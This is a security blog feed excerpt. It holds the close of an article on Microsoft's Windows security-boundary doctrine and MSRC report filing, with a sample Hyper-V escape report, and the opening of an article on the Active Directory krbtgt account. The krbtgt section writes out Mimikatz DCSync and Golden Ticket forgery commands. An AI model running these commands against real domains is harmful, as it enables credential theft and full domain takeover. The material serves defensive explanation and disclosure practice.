    subgraph Existing[&quot;Existing boundaries (current doctrine)&quot;]
        Net[&quot;Network&quot;]
        Krn[&quot;Kernel&quot;]
        Prc[&quot;Process&quot;]
        Sess[&quot;Session&quot;]
        Usr[&quot;User&quot;]
        AC[&quot;AppContainer&quot;]
        VM[&quot;Virtual machine&quot;]
        VTL[&quot;VTL0 to VTL1&quot;]
        AP[&quot;Administrator Protection&quot;]
    end
    subgraph Ingredients[&quot;Structural ingredients pushing the frontier&quot;]
        PRT[&quot;Primary Refresh Token&quot;]
        CA[&quot;Conditional Access policy&quot;]
        PI[&quot;Prompt injection primitives&quot;]
        PDE[&quot;Personal Data Encryption&quot;]
        Enc[&quot;VTL Enclaves&quot;]
    end
    subgraph Candidate[&quot;Candidate future boundaries&quot;]
        Cloud[&quot;Cloud-side: PRT / Conditional Access&quot;]
        AI[&quot;AI-mediated action expansion&quot;]
        SU[&quot;Same-user per-process&quot;]
    end
    Usr --&amp;gt; PRT
    Usr --&amp;gt; CA
    PRT --&amp;gt; Cloud
    CA --&amp;gt; Cloud
    PI --&amp;gt; AI
    Sess --&amp;gt; PI
    PDE --&amp;gt; SU
    Enc --&amp;gt; SU
    VTL --&amp;gt; Enc
&lt;p&gt;None of these candidates is on the table yet. All four are being pushed by primitives -- the Primary Refresh Token, prompt injection, Administrator Protection, the Recall directory ACL -- that have already shipped. The next decade&apos;s boundary list is being negotiated now, in real research posts and MSRC replies. The question is how &lt;em&gt;you&lt;/em&gt; file a report into that negotiation.&lt;/p&gt;
&lt;h2&gt;13. How to File a Useful MSRC Report&lt;/h2&gt;
&lt;p&gt;Everything in this article has been theory until this section. Here is how the doctrine becomes a checklist you can apply to your own findings before the submit button.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Read the servicing-criteria document first&lt;/strong&gt; [@msrc-criteria]. Map your finding to a boundary entry. If it does not map, expect a feature-defeat reply. If it maps cleanly, you know in advance that the disposition path goes through Question 2.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Lead the MSRC submission with the boundary claim in the first sentence.&lt;/strong&gt; &lt;em&gt;&quot;This issue violates the [process | kernel | session | network | user | AppContainer | VM | VTL | Administrator Protection] boundary because &lt;code&gt;&amp;lt;reason&amp;gt;&lt;/code&gt;.&quot;&lt;/em&gt; The triage engineer reading your report should never have to infer which boundary you are claiming. Name it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Include the severity-meets-bar argument in the second paragraph.&lt;/strong&gt; Critical / Important / Moderate / Low per the Bug Bar [@msrc-bugbar]. Cite the specific bug-type cell (RCE, EoP, info disclosure, DoS, spoofing, tampering) and the pivot (server vs client; default-on vs default-off; user interaction required vs not). Worked examples beat assertions.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;If the finding crosses a feature &lt;em&gt;and&lt;/em&gt; a boundary, lead with the boundary.&lt;/strong&gt; The feature defeat is supporting evidence, not the primary claim. A Defender bypass that also crosses the network boundary is a network-boundary report with a Defender defeat as supporting detail, not the other way around.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Expect the reply to be operationally predictable.&lt;/strong&gt; If the finding is on the feature side and severity is not Critical, the reply will be &quot;by design / consider for next version.&quot; Plan publication accordingly. A 90-day Project Zero clock that lines up with a probable &quot;by design&quot; reply is not a failed disclosure -- it is a successful one, because the reply was predicted in advance [@project-zero-9030].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;For bounty-eligible classes, read the program-scope page carefully.&lt;/strong&gt; Hyper-V ($5K - $250K) [@msrc-bounty-hyperv], Windows Insider Preview ($500 - $100K) [@msrc-bounty-wip], Edge ($250 - $30K) [@msrc-bounty-edge], plus the Identity / Cloud / M365 / Azure programs [@msrc-bounty-root]. The boundary-payout mapping is dominantly tight; the program-scope page tells you whether the bounty fires.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;If the reply surprises you, the &quot;exceptions may be made&quot; clause is the framing&lt;/strong&gt; [@msrc-criteria]. A feature defeat that &lt;em&gt;does&lt;/em&gt; receive a bulletin does not contradict the doctrine; it invokes the exception. A boundary crossing that &lt;em&gt;does not&lt;/em&gt; receive a bulletin invokes the exception in the other direction (severity below bar). Either way, the doctrine is not broken; the exception clause is doing its job.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Before you spend three weeks reverse-engineering a primitive, spend three minutes reading the relevant Microsoft Bounty Program scope page. The page tells you, in plain language, whether Microsoft considers the primitive class you are attacking to be bounty-eligible. If the bounty program does not list your primitive class -- if there is no UAC-bypass bounty, no Defender-bypass-by-detection-evasion bounty, no PPL-bypass bounty -- the boundary classification has already told you the operational answer. You can still publish the research; you just know the disposition in advance.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre&gt;&lt;code&gt;Subject: Boundary violation -- Hyper-V guest-to-host escape via
         root-partition heap UAF (Critical, RCE, default-on)

Section 1 -- Boundary claim
  This issue violates the Hyper-V virtual machine (guest-to-host)
  security boundary as enumerated in the Microsoft Security Servicing
  Criteria for Windows. The attack flow: a malicious L1 guest VM
  triggers a use-after-free in a Hyper-V root-partition component
  reachable via VMBus; the freed allocation is reclaimed with
  attacker-controlled data via a follow-up VMBus message; the
  resulting type confusion yields remote code execution in the host
  root-partition context with SYSTEM privileges.

Section 2 -- Severity argument
  Per the Microsoft Vulnerability Severity Classification for Windows
  bug bar, this is Critical severity:
    - Vulnerability type: Remote Code Execution
    - Server severity: Critical (server pivot: Hyper-V host is by
      definition a server role)
    - Client severity: Critical (client pivot: same primitive on
      client Hyper-V used by Windows Sandbox / WSL2)
    - Default-on: Yes (the affected root-partition component ships
      and runs by default on all Hyper-V hosts)
    - User interaction required: No
    - Attack complexity: Low

Section 3 -- Reproduction
  - Attached: minimal L1 guest exploit binary (Linux x86_64),
    deterministic on Windows Server 2025 Hyper-V build 26100.4061.
  - Attached: WinDbg crash dump showing the UAF and the controlled
    write primitive.
  - Attached: video of the SYSTEM shell on the host opened by an
    unprivileged user in the guest.

Section 4 -- Bounty eligibility
  Microsoft Hyper-V Bounty Program scope: L1 Guest Escape -- RCE on
  the host from the guest. Requested payout tier per program scope
  page.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is the checklist. The doctrine is internalised. You can predict the disposition of any Windows finding from the boundary list, the severity scheme, and the exception clause. The only thing left is the closing -- the return to the researcher we opened with.&lt;/p&gt;
&lt;h2&gt;14. Frequently Asked Questions and Closing&lt;/h2&gt;
&lt;p&gt;Return to the researcher we opened with. Their &quot;UAC bypass&quot; was filed against a primitive that was never on the boundary list, and the MSRC reply was operationally correct, not a cop-out. The doctrine the reply invoked is the one this article has just walked.&lt;/p&gt;

No. UAC was never officially classified as a boundary. Mark Russinovich&apos;s June 2007 *Inside Windows Vista User Account Control* article stated verbatim that *&quot;UAC elevations are conveniences and not security boundaries&quot;* -- two years before the January 2009 Long Zheng and Rafael Rivera Windows 7 beta UAC auto-elevation disclosure [@russinovich-vista-uac-wayback]. What Microsoft changed in 2009 was the *implementation* (UAC slider promoted to High integrity; UAC-settings changes prompting), not the *classification*. Russinovich&apos;s July 2009 follow-up article restated the original position [@ms-learn-russinovich-win7].

No. &quot;By design&quot; means the doctrine explicitly chose not to service this primitive class as a boundary violation. Microsoft may still harden the feature in a future Windows release, ship out-of-band Canary build mitigations (as with PPLFault build 25941) [@landau-pplfault], or assign CVEs to specific exploitation chains that cross *other* boundaries (as with Windows Downdate&apos;s CVE-2024-21302) [@leviev-downdate-update]. The finding is interesting research. It simply does not receive a CVE under the published doctrine.

Probably not, but the Administrator Protection elevation *path* is now a boundary [@ms-learn-admin-protection], and the Landau / Leviev disclosures keep pressure on the unmoved part of the classification. The structural impossibility argument (admin loads drivers; drivers run in kernel) makes a doctrinal reclassification unlikely without a deeper architectural change. The most plausible architectural change would be the extension of VTL Enclaves and VBS Trustlets to host security-critical kernel components, such that *admin-to-VTL1* becomes the boundary even as *admin-to-VTL0-kernel* stays a feature [@ms-learn-vbs-ci].

No. Defender bypasses that do not also cross another boundary typically do not receive bulletins. Tavis Ormandy&apos;s 2014 to 2017 Defender disclosures earned CVEs because the bugs were memory-corruption primitives reachable from attacker-controlled inputs over the network -- they crossed the network boundary, not because the Defender bypass itself was a boundary crossing. The CVE-2017-0290 *crazy bad* MsMpEng RCE, addressed by Microsoft Security Advisory 4022344 (May 8, 2017), is the flagship instance [@ms-advisory-4022344]. A clever signature-evasion technique alone earns &quot;by design.&quot;

No. It has grown by accretion: Session 0 isolation (Vista, 2007); AppContainer / Edge sandbox (Windows 8 / 1607, 2012 to 2016); VBS / VTL (Windows 10 1507, 2015); Administrator Protection elevation path (2025) [@ms-learn-admin-protection]. The list is expected to keep growing. Candidate future entries include cloud-side primitives (Conditional Access, Primary Refresh Token) and possibly an AI-mediated action-expansion entry.

Not on its own. BYOVD only earns a Microsoft CVE if a second primitive (network, user, AppContainer) is also crossed, or if the *driver vendor* receives the CVE. The Microsoft *Vulnerable Driver Blocklist* is feature hardening that ships in Windows updates, but the loadability of a properly-signed driver by an administrator is not a boundary crossing under the doctrine [@leviev-downdate-update].

No. AM-PPL is a *feature*. The Microsoft Learn page documents PPL as a hardening mechanism for anti-malware services [@ms-learn-am-ppl], and Gabriel Landau&apos;s *Inside Microsoft&apos;s Plan to Kill PPLFault* preserves the verbatim MSRC position: *&quot;Microsoft does not consider PPL to be a security boundary&quot;* [@landau-pplfault]. Microsoft will still ship PPLFault-class mitigations as feature hardening (build 25941 was the canary), but PPL-bypass reports that do not also cross another boundary do not earn standard Patch Tuesday bulletins.
&lt;h3&gt;Closing&lt;/h3&gt;
&lt;p&gt;The Administrator Protection addition is the most interesting recent move because it &lt;em&gt;closes&lt;/em&gt; the elevation-path gap that the entire UAC era could not close. Microsoft added the SMAA elevation path to the boundary table while leaving the admin-to-kernel primitive on the feature side. The result is a two-tier classification: UAC bypasses still do not get CVEs, but Administrator Protection bypasses do -- and Forshaw&apos;s nine pre-GA disclosures, all of which Microsoft &lt;em&gt;fixed&lt;/em&gt; (not &quot;by design&quot;-replied) are the public-record evidence that the new classification is operationally enforced [@pz-tracker-432313668]. The 2026 frontier is cloud-side and AI-mediated. The boundary list is still growing.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The doctrine of what is a boundary is the silent gatekeeper of MSRC triage. Reading it is the difference between filing a useful report and getting back &quot;by design -- UAC is not a security boundary.&quot; Every Windows security engineer should be able to recite the boundary list from memory. After this article, you can.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-security-boundaries-the-document-that-decides-what-gets-a-cve&quot; keyTerms={[
  { term: &quot;Security boundary&quot;, definition: &quot;A logical separation between security domains with different levels of trust, with security policy dictating what can pass through. Boundary crossings receive CVEs under the MSRC servicing criteria when severity meets the bar.&quot; },
  { term: &quot;Security feature&quot;, definition: &quot;A mechanism that raises the difficulty of attack but does not carry a vendor guarantee that policy holds. Feature defeats may still ship as security updates via the exception clause, but they are not boundary crossings.&quot; },
  { term: &quot;Two-question rule&quot;, definition: &quot;(1) Does the vulnerability violate the goal or intent of a security boundary or a security feature? (2) Does the severity meet the bar for servicing? Both yes = service via security update. Either no = by design / next version, with exceptions.&quot; },
  { term: &quot;System Managed Administrator Account (SMAA)&quot;, definition: &quot;The Administrator Protection elevation primitive: a hidden, profile-separated user account with its own SID, profile, and logon session, used to host elevated-administrator tokens authorised via Windows Hello.&quot; },
  { term: &quot;Trustlet&quot;, definition: &quot;A process running in VTL1 (Isolated User Mode), protected by the hypervisor from VTL0 (the normal kernel). LsaIso, the Isolated LSA Trustlet that holds Credential Guard credentials, is the canonical example.&quot; },
  { term: &quot;BYOVD&quot;, definition: &quot;Bring Your Own Vulnerable Driver: an administrator installs a legitimately-signed driver containing an exploitable vulnerability and uses the driver to obtain arbitrary kernel-mode code execution. Not a Microsoft boundary crossing because admin loads drivers by design.&quot; },
  { term: &quot;Protected Process Light (PPL)&quot;, definition: &quot;A signer-hierarchy mechanism introduced in Windows 8.1 that lets specially-signed processes refuse code injection and termination even from administrators. Microsoft explicitly classifies PPL as not a security boundary.&quot; },
  { term: &quot;Mandatory Integrity Control (MIC)&quot;, definition: &quot;Each securable object and access token carries an integrity level: Untrusted / Low / Medium / High / System. Lower-integrity subjects cannot write to higher-integrity objects regardless of DACL permissions.&quot; }
]} flashcards={[
  { front: &quot;Is UAC a security boundary?&quot;, back: &quot;No. UAC has been classified as a security feature, not a boundary, since Russinovich&apos;s June 2007 TechNet article. UACMe has documented more than 80 auto-elevation bypasses and zero CVEs.&quot; },
  { front: &quot;Is admin-to-kernel a security boundary?&quot;, back: &quot;No. Administrators can load drivers by design; drivers run in kernel mode. The Landau ItsNotASecurityBoundary repo name is an explicit homage to this MSRC policy.&quot; },
  { front: &quot;Is the Administrator Protection elevation path a security boundary?&quot;, back: &quot;Yes, as of 2025. The SMAA token has a separate SID, separate profile, and separate logon session from the user&apos;s standard-user token; the user boundary applies.&quot; },
  { front: &quot;Is HVCI a security boundary?&quot;, back: &quot;No. HVCI is a feature enforced inside VTL1. The VTL boundary is on the boundary list; HVCI is a feature that lives at that boundary.&quot; },
  { front: &quot;Is PPL a security boundary?&quot;, back: &quot;No. Microsoft has stated verbatim that &apos;Microsoft does not consider PPL to be a security boundary.&apos; AM-PPL is a feature that protects anti-malware services.&quot; },
  { front: &quot;Is bypassing Defender a CVE?&quot;, back: &quot;Only if the bypass also crosses another boundary. Defender-itself bypasses are feature defeats; Tavis Ormandy&apos;s 2014 to 2017 CVEs crossed the network boundary.&quot; },
  { front: &quot;Is same-user post-authentication a security boundary?&quot;, back: &quot;No. Once a process executes under a user&apos;s session, it inherits the user&apos;s trust. Forshaw&apos;s June 2024 Recall ACL post is the doctrinal anchor.&quot; },
  { front: &quot;Is guest-to-host on Hyper-V a security boundary?&quot;, back: &quot;Yes. It pays $5,000 to $250,000 USD under the Microsoft Hyper-V Bounty Program -- the highest single-finding payout in the Microsoft bounty catalogue.&quot; }
]} questions={[
  { q: &quot;Why is decoupling Question 1 (classification) from Question 2 (severity) the load-bearing engineering decision of the entire doctrine?&quot;, a: &quot;Because a single-question rule would collapse the doctrine into opaque MSRC judgment. Decoupling lets Microsoft commit to a published taxonomy on the classification half while retaining engineering judgment on severity, with the explicit exception clause as the relief valve in either direction.&quot; },
  { q: &quot;Explain why HVCI is on the feature list even though VTL is on the boundary list.&quot;, a: &quot;HVCI is a feature enforced inside VTL1, under the protection of the hypervisor. The VTL boundary protects HVCI from VTL0 attackers, but HVCI itself does not enforce a separation between security domains. The boundary is the VTL line; HVCI is one of the features that runs at that boundary.&quot; },
  { q: &quot;How did Administrator Protection close a gap that the entire UAC era could not?&quot;, a: &quot;By creating a new elevation primitive (the SMAA token) with a separate SID, separate profile, and separate logon session, so that the existing user boundary applies. The Russinovich-2007 shared-resources structural argument that disqualified UAC from boundary status no longer applies because the SMAA token does not share those resources with the standard-user token.&quot; },
  { q: &quot;Why does the absence of a UAC-bypass bounty matter for understanding the doctrine?&quot;, a: &quot;Because the bounty schedule mirrors the boundary list mechanically. Microsoft only pays standalone bounties for findings that violate primitives the company commits to defending. The absence of a UAC bounty is structural, not oversight: there is no boundary to violate, so there is nothing to pay for.&quot; },
  { q: &quot;Predict the MSRC disposition of a Defender bypass that allows malware to evade signature detection but does not introduce any other primitive. Justify your prediction.&quot;, a: &quot;By design / consider for next version. Defender is on the feature list (heuristic detection cannot guarantee detection); a signature-evasion technique is a feature defeat with no boundary crossing; the severity gate is satisfied only by Critical / Important impact, and a pure detection evasion typically does not meet the bar. The exception clause could fire for an unusually impactful detection-evasion technique, but the default disposition is by design.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;The boundary list. From memory. Now.&lt;/p&gt;
</content:encoded><category>windows-security</category><category>msrc</category><category>vulnerability-disclosure</category><category>security-boundaries</category><category>cve</category><category>patch-tuesday</category><category>uac</category><category>administrator-protection</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>KRBTGT: The Account That Owns Active Directory</title><link>https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/</link><guid isPermaLink="true">https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/</guid><description>Active Directory ships with one cryptographic key whose disclosure forges valid TGTs for every principal -- and why rotating it is necessary but not sufficient.</description><pubDate>Sat, 23 May 2026 00:00:00 GMT</pubDate><content:encoded>
Active Directory&apos;s `krbtgt` account is the one secret in any Windows domain whose disclosure forges valid Ticket-Granting Tickets for every principal -- including ones that do not exist. Twelve years of attacks (Golden, Diamond, Sapphire) and Microsoft&apos;s responses (the MS14-068 patch, KrbtgtFullPacSignature, the two-reset rotation procedure) converge on one fact: krbtgt rotation invalidates forged TGTs but does not recover the systemic compromise that produced them. That distinction is why confirmed krbtgt compromise is a forest-rebuild event in modern incident-response playbooks, not a key-rotation event.
&lt;h2&gt;1. Ninety Seconds to Domain Admin&lt;/h2&gt;
&lt;p&gt;A single &lt;code&gt;mimikatz kerberos::golden&lt;/code&gt; command, with the krbtgt account&apos;s AES-256 long-term key in hand, walks the attacker onto any resource in the domain as Administrator. No Domain Admin password was reset. No Domain Admin account was created. No SACL on a sensitive object fired. No LSASS on any host was dumped. No signature-based IDS rule triggered. The attacker holds exactly one cryptographic key -- the long-term key of the RID-502 service account named &lt;code&gt;krbtgt&lt;/code&gt; -- and the entire Kerberos trust hierarchy of the domain now accepts whatever they sign [@mitre-t1558001]. The section title&apos;s &quot;ninety seconds&quot; is an illustration of how fast the attack is on the wall clock, not a measured demonstration from a published primary.&lt;/p&gt;
&lt;p&gt;The operator sequence is short enough to quote. Earlier in the engagement, the attacker ran &lt;code&gt;lsadump::dcsync /user:contoso\krbtgt&lt;/code&gt; from a member-server foothold and walked off with the krbtgt long-term key material [@mimikatz]. Then they switched tools to forge a ticket from scratch:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mimikatz # kerberos::golden /domain:contoso.local
                            /sid:S-1-5-21-1004336348-1177238915-682003330
                            /aes256:&amp;lt;key&amp;gt;
                            /user:Administrator /id:500
                            /groups:512,513,518,519,520 /ptt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That single command, documented by Sean Metcalf for operators in 2015 [@adsec-1640], does the forgery in process memory, injects the ticket into the local Kerberos cache (&lt;code&gt;/ptt&lt;/code&gt; = pass-the-ticket), and lets the next &lt;code&gt;dir \\dc01\admin&lt;/code&gt; succeed.&lt;/p&gt;
&lt;p&gt;Count the controls that did not fire while the forged ticket was being minted and presented. No Domain Admin password reset, because the attacker never used a Domain Admin password. No new privileged account, because the attacker impersonated an existing one (RID 500). No SACL on a sensitive object, because the ticket was already approved by the Kerberos trust root before any object was touched. No LSASS dump on a writeable DC, because &lt;a href=&quot;https://paragmali.com/blog/two-checkmarks-and-the-keys-to-the-kingdom-how-active-direct/&quot; rel=&quot;noopener&quot;&gt;DCSync&lt;/a&gt; is a replication API call, not a memory scrape [@mitre-t1003006]. No IDS hit on a known-malicious payload, because Mimikatz lives in attacker process memory and the wire traffic is, structurally, a TGS-REQ. No anomalous logon time, MFA prompt, or Conditional Access decision, because Kerberos pre-authentication is satisfied by holding a valid TGT and the TGT was minted offline.&lt;/p&gt;
&lt;p&gt;The article&apos;s load-bearing thesis: within the Kerberos trust root of a single domain, the krbtgt key is the unique secret whose disclosure yields valid TGTs for every principal -- including ones that do not exist. The technical recovery (two-reset rotation) is well-documented [@ms-forest-recovery] and does cryptographically invalidate forged tickets. But the operational recovery from a confirmed krbtgt compromise is a forest-rebuild event for reasons that have nothing to do with the krbtgt key itself.&lt;/p&gt;
&lt;p&gt;This produces an apparent contradiction. Microsoft documents a clean two-reset rotation procedure with a ten-hour interval [@ms-forest-recovery]; Mandiant- and SpecterOps-style incident-response playbooks treat confirmed krbtgt compromise as a forest-rebuild event [@specterops-dot2]. Both statements are simultaneously true. The job of the next ten thousand words is to explain why -- starting with what krbtgt actually is. Not the key. Not the protocol. The account itself: RID 502, disabled, indelible.&lt;/p&gt;
&lt;h2&gt;2. The Account: RID 502, Disabled, Indelible&lt;/h2&gt;
&lt;p&gt;Open Active Directory Users and Computers on a fresh Windows Server 2022 domain promoted ten seconds ago. In the &lt;code&gt;Users&lt;/code&gt; container there is an account called &lt;code&gt;krbtgt&lt;/code&gt;. It has no password visible to the admin. It is disabled. Try to enable it -- the checkbox accepts the click, but the next replication cycle puts the account right back into the disabled state. Try to rename it -- the operation appears to succeed, but the &lt;code&gt;objectSID&lt;/code&gt; does not change. Try to delete it -- the operation fails outright. You cannot log in as it; the disabled-for-interactive-logon property is enforced inside the Security Accounts Manager. The account exists exactly because the domain exists; the lifetime of the account and the lifetime of the domain are the same lifetime [@ms-default-accounts].&lt;/p&gt;
&lt;p&gt;Why does Active Directory ship with an account that no admin can use, no attacker can authenticate as interactively, and no operator can remove?&lt;/p&gt;

The Kerberos Ticket-Granting Ticket service account that exists, exactly once per Active Directory domain, to hold the long-term cryptographic key the domain controllers use to encrypt and sign every TGT issued in the domain. The account name itself is the Kerberos principal name (`krbtgt/DOMAIN@DOMAIN`) inherited from MIT&apos;s 1988 Kerberos v4 design.
&lt;p&gt;&lt;strong&gt;Creation.&lt;/strong&gt; The account is created automatically when the first writeable domain controller is promoted in a new domain. The Microsoft Learn default-accounts page lists it alongside &lt;code&gt;Administrator&lt;/code&gt; and &lt;code&gt;Guest&lt;/code&gt; as one of the three default local accounts in the &lt;code&gt;Users&lt;/code&gt; container, with the verbatim note that &quot;the KRBTGT account can&apos;t be enabled in Active Directory&quot; [@ms-default-accounts]. The account&apos;s lifecycle is bound to the domain&apos;s lifecycle; there is no operator-controllable provisioning of a krbtgt account, and no de-provisioning short of demoting the domain.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;RID 502.&lt;/strong&gt; The relative identifier at the tail of the account&apos;s SID (&lt;code&gt;S-1-5-21-&amp;lt;domain&amp;gt;-502&lt;/code&gt;) is fixed by the well-known SID specification [@ms-sids]. Sean Metcalf&apos;s operator primer confirms the RID-502 binding directly: &quot;Each Active Directory domain has an associated KRBTGT account ... The SID for the KRBTGT account is &lt;code&gt;S-1-5-&amp;lt;domain&amp;gt;-502&lt;/code&gt;&quot; [@adsec-483].RIDs 500 through 1000 are reserved for built-in security principals; 500 is Administrator, 501 is Guest, 502 is krbtgt. Renaming the &lt;code&gt;sAMAccountName&lt;/code&gt; cannot move the RID. The KDC service derives its key lookups from the principal name, which binds to the RID, not from the friendly name shown in ADUC. Renaming krbtgt as a defensive measure is a fallacy that the next section will sharpen further.&lt;/p&gt;
&lt;p&gt;Each Read-Only Domain Controller has its own &lt;code&gt;krbtgt_&amp;lt;rid&amp;gt;&lt;/code&gt; account whose key signs only that RODC&apos;s tickets. The full-domain krbtgt account is read-only from the RODC&apos;s perspective -- the design property that lets RODCs participate in Kerberos without holding the full-domain trust root [@adsec-483].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Container.&lt;/strong&gt; &lt;code&gt;CN=Users,DC=&amp;lt;domain&amp;gt;&lt;/code&gt;. The standard Users container, not a Tier-0 OU or a Protected Users group. The account is privileged by virtue of its RID, not by virtue of its containership. Moving it into a different container does not change its semantic role to the KDC.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disabled for interactive logon.&lt;/strong&gt; Documented verbatim on the Microsoft Learn default-accounts page: &quot;The KRBTGT account can&apos;t be enabled in Active Directory&quot; [@ms-default-accounts]. The account is reserved for the KDC service. There is no interactive logon surface attached, no LSA logon-rights grant, no Kerberos pre-authentication path that produces a TGT &lt;em&gt;for&lt;/em&gt; the krbtgt account itself. The account exists to provide a key, not to authenticate.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Indelible and unrenamable.&lt;/strong&gt; Also from the same Microsoft Learn page: &quot;This account can&apos;t be deleted, and the account name can&apos;t be changed&quot; [@ms-default-accounts]. ADUC will show a renamed display, but the underlying object identity (the RID, the principal name) is fixed by the directory schema and by &lt;code&gt;LsaSrv&lt;/code&gt; enforcement on the writeable DCs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Password.&lt;/strong&gt; System-generated, unknown to operators by design. Resetting it via ADUC produces a value Active Directory immediately replaces with a fresh system-generated value. The mechanism that produces the current key is therefore not operator-controllable; rotation is the only primitive operators have over the key value [@ms-forest-recovery].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Password history equals 2.&lt;/strong&gt; Documented verbatim on the AD Forest Recovery page: &quot;The password history value for the krbtgt account is 2, meaning it includes the two most recent passwords&quot; [@ms-forest-recovery]. This is the mechanical foundation for the two-reset procedure Section 7 will dissect. The KDC keeps both a &lt;em&gt;current&lt;/em&gt; and a &lt;em&gt;previous&lt;/em&gt; key in the krbtgt account; in-flight TGT validation tries both during the brief window after a rotation; one reset retires only the older of the two; a second reset, separated by at least the maximum ticket lifetime, evicts the key the attacker held.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Where the key lives.&lt;/strong&gt; The KDC service (&lt;code&gt;kdcsvc.dll&lt;/code&gt;) on every writeable DC reads the krbtgt long-term key from &lt;code&gt;ntds.dit&lt;/code&gt; at startup and holds it in process memory for ticket signing and validation. &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt;&apos;s VBS trustlet -- LSAISO -- does not isolate this read on writeable DCs by design: a DC &lt;em&gt;must&lt;/em&gt; read the key to issue tickets [@ms-credential-guard] (see also §10 Aside on why Credential Guard skips the DC). This is the structural asymmetry that makes the krbtgt key reachable to any attacker who can compromise a writeable DC (or invoke its replication API remotely), even on a system where Credential Guard is otherwise enforced everywhere else.&lt;/p&gt;
&lt;p&gt;We know what the account is now: a non-interactive, indelible, RID-502 service principal with a system-generated, two-slot password history. But the account is just the container. The rest of the article cares about the &lt;em&gt;long-term cryptographic key&lt;/em&gt; it holds.&lt;/p&gt;
&lt;h2&gt;3. The Key: What RFC 4120 and [MS-KILE] Specify&lt;/h2&gt;
&lt;p&gt;Hand a network capture of a Kerberos AS-REP to a Wireshark dissector. The dissector shows the TGT as a sequence of ASN.1 fields. One field is named &lt;code&gt;enc-part&lt;/code&gt; and its content is opaque. The dissector knows the format of what is &lt;em&gt;inside&lt;/em&gt; that opaque blob -- an &lt;code&gt;EncTicketPart&lt;/code&gt; -- but it cannot show the field values because the blob is encrypted [@rfc4120]. Encrypted under what? Under one key: the long-term key of the principal named &lt;code&gt;krbtgt/CONTOSO.LOCAL@CONTOSO.LOCAL&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The Microsoft specification puts it as plainly as is possible to put it. [MS-KILE] specifies that the KDC encrypts each ticket with the long-term key of the ticket&apos;s server principal (RFC 4120 §5.3); for a TGT, that server principal is &lt;code&gt;krbtgt/CONTOSO.LOCAL@CONTOSO.LOCAL&lt;/code&gt;, so every TGT is encrypted under the krbtgt long-term key [@mskile]. That sentence, more than any other in the Microsoft Open Specifications corpus, is the cryptographic foundation of Active Directory authentication. Every TGT issued by every writeable DC in the domain is encrypted under one key. There is no per-account key, no per-DC key, no rolling subkey. One key, one trust scope.&lt;/p&gt;

The credential the Kerberos Key Distribution Center issues at logon, encrypted under the KDC&apos;s own service key (in Windows, the krbtgt account&apos;s long-term key), that the client subsequently presents to request service tickets without re-authenticating with a password. RFC 4120 §5.3 defines its fields; [MS-KILE] specifies the Windows wire profile [@rfc4120][@mskile].

The Kerberos service that issues TGTs (the Authentication Service) and exchanges TGTs for service tickets (the Ticket-Granting Service). In Active Directory the KDC runs as `kdcsvc.dll` on every writeable domain controller; it holds the krbtgt long-term key in process memory for the lifetime of the service [@rfc4120].
&lt;h3&gt;Inside the encrypted blob&lt;/h3&gt;
&lt;p&gt;RFC 4120 §5.3 specifies the fields of the &lt;code&gt;EncTicketPart&lt;/code&gt;: a session key the KDC generates for this TGT, the client&apos;s name, the cross-domain transit path, the timestamps (&lt;code&gt;authtime&lt;/code&gt;, &lt;code&gt;starttime&lt;/code&gt;, &lt;code&gt;endtime&lt;/code&gt;, &lt;code&gt;renew-till&lt;/code&gt;), the optional client-address list, and a final field of &lt;code&gt;authorization-data&lt;/code&gt; that Windows uses to carry the Privilege Attribute Certificate [@rfc4120].&lt;/p&gt;

The Windows-specific data structure embedded inside the `authorization-data` field of every Kerberos ticket. The PAC carries the user&apos;s SID, the SIDs of every group the user belongs to, account restrictions, profile path, logon server, and a small set of cryptographic signatures the KDC computes to bind the structure to the ticket. Defined in [MS-PAC] [@mspac].
&lt;p&gt;The PAC is where the load-bearing security claim of Windows Kerberos lives. RFC 4120 itself does not care about groups; it cares about whether the client can prove identity to a server. The PAC carries the &lt;em&gt;authorization&lt;/em&gt; layer Windows needs on top of authentication: which security principal the ticket represents, which groups confer which permissions, which restrictions apply [@mspac]. The first thing a Windows file server does when it receives a service ticket is decode the PAC, read the SIDs, and run the access-check algorithm.&lt;/p&gt;
&lt;h3&gt;The three signatures inside every PAC&lt;/h3&gt;
&lt;p&gt;The PAC is integrity-protected by a small set of signatures the KDC computes when it issues the ticket. As of the [MS-PAC] revision 26.0 dated June 10, 2024 [@mspac], a TGT-resident PAC carries three of them:&lt;/p&gt;
&lt;ol&gt;
